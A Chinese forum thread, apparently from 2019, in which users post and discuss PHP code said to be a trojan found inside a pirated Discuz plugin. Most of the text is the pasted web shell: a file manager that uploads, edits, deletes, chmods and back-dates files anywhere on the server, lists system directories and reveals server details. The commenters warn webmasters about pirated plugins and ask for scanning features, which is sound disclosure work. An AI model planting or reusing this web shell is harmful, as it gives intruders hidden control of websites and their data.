echo '<div class="msgbox">' . $msg . '</div>';
echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
subeval();
echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
echo '<div class="actall"><p>上傳到目錄 <input type="text" name="updir" style="width:398px;" value="' . $updir . '"></p>';
for ($i = 1; $i < $max; $i++) {
echo '<p>附件' . $i . ' <input type="file" name="uploads[' . $i . ']" style="width:300px;"> 重命名 <input type="text" name="renames[' . $i . ']" style="width:128px;"> ' . $msgs[$i] . '</p>';
}
echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上傳" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . $updir . '">';
subeval();
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;
default:
if (isset($_FILES['upfile'])) {
if ($_FILES['upfile']['name'] == '') {
$msg = '<h1>請選擇文件</h1>';
} else {
$rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename'];
$filea = $_FILES['upfile']['tmp_name'];
$fileb = strdir($nowdir . $rename);
$msg = fileu($filea, $fileb) ? '<h2>上傳文件' . $rename . '成功</h2>' : '<h1>上傳文件' . $rename . '失敗</h1>';
}
}
if (isset($_POST['act'])) {
switch ($_POST['act']) {
case "a":
if (!$_POST['files']) {
$msg = '<h1>請選擇文件 ' . $_POST['var'] . '</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i += @copy(strdir($nowdir . $filename), strdir($_POST['var'] . '/' . $filename)) ? 1 : 0;
}
$msg = $msg = $i ? '<h2>共復制 ' . $i . ' 個文件到' . $_POST['var'] . '成功</h2>' : '<h1>共復制 ' . $i . ' 個文件到' . $_POST['var'] . '失敗</h1>';
}
break;
case "b":
if (!$_POST['files']) {
$msg = '<h1>請選擇文件</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;
}
$msg = $i ? '<h2>共刪除 ' . $i . ' 個文件成功</h2>' : '<h1>共刪除 ' . $i . ' 個文件失敗</h1>';
}
break;
case "c":
if (!$_POST['files']) {
$msg = '<h1>請選擇文件 ' . $_POST['var'] . '</h1>';
} elseif (!ereg("^[0-7]{4}$", $_POST['var'])) {
$msg = '<h1>屬性值錯誤</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i += @chmod(strdir($nowdir . $filename), base_convert($_POST['var'], 8, 10)) ? 1 : 0;
}
$msg = $i ? '<h2>共 ' . $i . ' 個文件修改屬性為' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 個文件修改屬性為' . $_POST['var'] . '失敗</h1>';
}
break;
case "d":
if (!$_POST['files']) {
$msg = '<h1>請選擇文件 ' . $_POST['var'] . '</h1>';
} elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) {
$msg = '<h1>時間格式錯誤 ' . $_POST['var'] . '</h1>';
} else {
$i = 0;
foreach ($_POST['files'] as $filename) {
$i += @touch(strdir($nowdir . $filename), strtotime($_POST['var'])) ? 1 : 0;
}
$msg = $i ? '<h2>共 ' . $i . ' 個文件修改時間為' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 個文件修改時間為' . $_POST['var'] . '失敗</h1>';
}
break;
case "e":
$path = strdir($nowdir . $_POST['var'] . '/');
if (file_exists($path)) {
$msg = '<h1>目錄已存在 ' . $_POST['var'] . '</h1>';
} else {
$msg = @mkdir($path, 0777) ? '<h2>創建目錄 ' . $_POST['var'] . ' 成功</h2>' : '<h1>創建目錄 ' . $_POST['var'] . ' 失敗</h1>';
}
break;
case "rf":
$files = explode('|x|', $_POST['var']);
if (count($files) != 2) {
$msg = '<h1>輸入錯誤</h1>';
} else {
$msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? '<h2>重命名 ' . $files[1] . ' 為 ' . $files[0] . ' 成功</h2>' : '<h1>重命名 ' . $files[1] . ' 為 ' . $files[0] . ' 失敗</h1>';
}
break;
case "pd":
$files = explode('|x|', $_POST['var']);
if (count($files) != 2) {
$msg = '<h1>輸入錯誤</h1>';
} else {
$path = strdir($nowdir . $files[1]);
$msg = @chmod($path, base_convert($files[0], 8, 10)) ? '<h2>修改' . $files[1] . '屬性為' . $files[0] . '成功</h2>' : '<h1>修改' . $files[1] . '屬性為' . $files[0] . '失敗</h1>';
}
break;
case "edit":
if (isset($_POST['filename']) && isset($_POST['filecode'])) {
if ($_POST['tostr'] == 'utf') {
$_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']);
}
$msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '<h2>保存成功 ' . $_POST['filename'] . '</h2>' : '<h1>保存失敗 ' . $_POST['filename'] . '</h1>';
}
break;
case "deltree":
$deldir = strdir($nowdir . $_POST['var'] . '/');
if (!file_exists($deldir)) {
$msg = '<h1>目錄 ' . $_POST['var'] . ' 不存在</h1>';
} else {
$msg = deltree($deldir) ? '<h2>刪除目錄 ' . $_POST['var'] . ' 成功</h2>' : '<h1>刪除目錄 ' . $_POST['var'] . ' 失敗</h1>';
}
break;
}
}
$array = showdir($nowdir);
$thisurl = strdir('/' . strtr($nowdir, array(
ROOTDIR => ''
)) . '/');
$chown = substr(decoct(fileperms($nowdir)), -4);
if (!$chown) {
$chown = '0000';
}
$nowdir = strtr($nowdir, array(
'\'' => '%27',
'"' => '%22'
));
echo '<div class="msgbox">' . $msg . '</div>';
echo '<div class="actall"><form name="frm" id="frm" method="POST">';
subeval();
echo '當前路徑(' . $chown . ') <input type="text" name="dir" id="dir" style="width:500px;" value="' . strdir($nowdir . '/') . '"> ';
echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="轉到"> ';
echo '<select onchange="cd(options[selectedIndex].value);">';
echo '<option>---特殊目錄---</option>';
echo '<option value="' . ROOTDIR . '"> 網站根目錄 </option>';
echo '<option value="' . THISDIR . '"> 本程序目錄 </option>';
echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';
echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';
echo '<option value="C:/Program Files/">Win-Program</option>';
echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';
echo '<option value="C:/Documents and Settings/All Users/「開始」菜單/程序/啟動/">Win-啟動</option>';
echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';
echo '<option value="/usr/local/">Linux-local</option>';
echo '<option value="/tmp/">Linux-tmp</option>';
echo '<option value="/etc/">Linux-etc</option>';
echo '</select></form></div><div class="actall">';
echo '<input type="button" value="新建文件" onclick="nf(\'edit\',\'newfile.php\');" style="width:80px;"> ';
echo '<input type="button" value="創建目錄" onclick="txts(\'目錄名\',\'newdir\',\'e\');" style="width:80px;"> ';
echo '<input type="button" value="批量上傳" onclick="go(\'upfiles\',\'' . $nowdir . '\');" style="width:80px;"> ';
echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
subeval();
echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';
echo '<input type="file" name="upfile" style="width:256px;height:21px;"> ';
echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上傳" style="width:50px;"> ';
echo '上傳重命名為 <input type="text" name="rename" style="width:128px;">';
echo '</form></div>';
echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
subeval();
echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';
echo '<input type="hidden" name="act" id="act" value="">';
echo '<input type="hidden" name="var" id="var" value="">';
echo '<th><a href="javascript:void(0);" onclick="cd(\'' . dirname($nowdir) . '/\');">上級目錄</a></th><th style="width:8%">操作</th><th style="width:5%">屬性</th><th style="width:17%">創建時間</th><th style="width:17%">修改時間</th><th style="width:8%">下載</th>';
if ($array) {
asort($array['dir']);
asort($array['file']);
$dnum = $fnum = 0;
foreach ($array['dir'] as $path => $name) {
$prem = substr(decoct(fileperms($path)), -4);
$ctime = date('Y-m-d H:i:s', filectime($path));
$mtime = date('Y-m-d H:i:s', filemtime($path));
echo '<tr>';
echo '<td><a href="javascript:void(0);" onclick="cd(\'' . $nowdir . $name . '\');"><b>' . strtr($name, array(
'%27' => '\'',
'%22' => '"'
)) . '</b></a></td>';
echo '<td><a href="javascript:void(0);" onclick="dels(\'' . $name . '\');">刪除</a> ';
echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>';
echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';
echo '<td>' . $ctime . '</td>';
echo '<td>' . $mtime . '</td>';
echo '<td>-</td>';
echo '</tr>';
$dnum++;
}
foreach ($array['file'] as $path => $name) {
$prem = substr(decoct(fileperms($path)), -4);
$ctime = date('Y-m-d H:i:s', filectime($path));
$mtime = date('Y-m-d H:i:s', filemtime($path));
$size = size(filesize($path));
echo '<tr>';
echo '<td><input type="checkbox" name="files[]" value="' . $name . '"><a target="_blank" href="' . $thisurl . $name . '">' . strtr($name, array(
'%27' => '\'',
'%22' => '"'
)) . '</a></td>';
echo '<td><a href="javascript:void(0);" onclick="go(\'edit\',\'' . $name . '\');">編輯</a> ';
echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>';
echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';
echo '<td>' . $ctime . '</td>';
echo '<td>' . $mtime . '</td>';
echo '<td align="right"><a href="javascript:void(0);" onclick="go(\'down\',\'' . $name . '\');">' . $size . '</a></td>';
echo '</tr>';
$fnum++;
}
}
unset($array);
echo '</table>';
echo '<div class="actall" style="text-align:left;">';
echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
echo '<input type="button" value="復制" style="width:50px;" onclick=\'txts("復制路徑","' . $nowdir . '","a");\'> ';
echo '<input type="button" value="刪除" style="width:50px;" onclick=\'dels("b");\'> ';
echo '<input type="button" value="屬性" style="width:50px;" onclick=\'txts("屬性值","0666","c");\'> ';
echo '<input type="button" value="時間" style="width:50px;" onclick=\'txts("修改時間","' . $mtime . '","d");\'> ';
echo '目錄[' . $dnum . '] - 文件[' . $fnum . ']</div></form>';
break;
}
?><div class="footag"><?php
echo php_uname() . '<br>' . $_SERVER['SERVER_SOFTWARE'];
?></div></div></div></body></html><?php
unset($array);
?>

復制代碼

耗子 · 發表于 2019-7-15 11:28:51

很早之前我就發現了，告訴了很多站長可他們就是不相信。。我也沒辦法

林子浩 · 發表于 2019-7-15 18:56:07

有人說源碼哥的插件里有木馬

LooTan · 發表于 2019-7-16 07:40:09

樂虎國際 · 發表于 2019-7-16 10:24:59

支持

yeah · 發表于 2019-7-16 10:39:47

安全專員 · 發表于 2019-7-18 16:41:11

林子浩發表于 2019-7-15 18:56
有人說源碼哥的插件里有木馬

無利不起早，做盜版的，那么便宜賣你插件，甚至免費送，背后比如有他的目的：
安全小知識：為什么使用盜版插件容易被掛馬！

在github上活捉一只黑客兼做盜版插件的狗，3315款插件受害！

愚蠢的包子 · 發表于 2019-7-18 21:17:06

大佬講解下這代碼是啥意思，小白一臉懵逼

yehui2512 · 發表于 2019-7-19 19:13:31

DZ后臺增加功能，“檢查權限”，“查殺木馬”。

震驚：從某盜版插件里扒出的木馬文件，你在人家面前裸奔

相關帖子

產品服務

開發者服務

使用教程